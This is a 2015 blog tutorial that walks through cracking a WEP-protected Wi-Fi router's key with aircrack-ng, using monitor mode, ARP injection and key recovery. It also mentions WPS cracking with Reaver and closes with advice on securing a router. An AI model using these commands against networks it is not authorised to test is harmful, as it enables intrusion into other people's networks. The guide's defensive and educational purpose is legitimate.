You are here

Home » How to hack WEP-protected or WPS-enabled Wi-Fi routers with an Alfa AWUS036NH, or: how to protect your Wi-Fi

How to hack WEP-protected or WPS-enabled Wi-Fi routers with an Alfa AWUS036NH, or: how to protect your Wi-Fi

Posted on:22 May 2015

By:Don

A hacker can sit three miles away from a house and he is still able to hack into the router and use the Wi-Fi. But how?

Legal

1. It's illegal to hack other people's Wi-Fi routers. Use this guide just for educational purposes and test it just with own access points (APs).
2. It is forbidden to remove all transmit power restrictions. Every country has own transmit power limits.

Let's hack your own WEP-protected router now

(You need to install the aircrack-ng packages if you are not using Kali.)

The old WEP standard is highly vulnerable. The whole hacking doesn't take more than an hour.

1. Root:

sudo -s

2. Check the wireless adapters:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

3. Capture Traffic and find your WEP-protected AP:

airodump-ng mon0

4. Capture from the found WEP AP:

airodump-ng --bssid 00:MY:WE:P0:12:34 -c 11 -w WEPoutput mon0

Change the bssid and the channel (-c) numbers. Wait till you capture a MAC address under the section STATION, like MM:AA:CC:5d:5w:r8.

5. Inject ARP Traffic to boost the process:

aireplay-ng -3 -b 00:MY:WE:P0:12:34 -h MM:AA:CC:5d:5w:r8 mon0

6. Crack the Password:

aircrack-ng WEPoutput-01.cap

Aircrack Note: “You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.”

Hack your own WPS-enabled router with Reaver

The WPA2 standard is safe – if you use a complex password and disable WPS. While running possible passwords against huge lists is just a vague bet, WPS cracking, if available, comes with clear results within 5 to 10 hours. New APs no longer have this WPS vulnerability, but those older than 2013 are still hackable through WPS.

So, how can I protect my Wi-Fi router from hackers

If someone is interested in hacking into your network, he can choose between so many ways to so. As of today, your Wi-Fi is safe if you do the following:

1. Don't use old routers, especially those with the unsafe WEP standard.
2. Turn the WPS off. Even on new routers with WPS vulnerability patches, disabling is the safer bet.
3. Use long, complex, and unnatural passwords: like U.bTj-L&kd+_da8eW$85.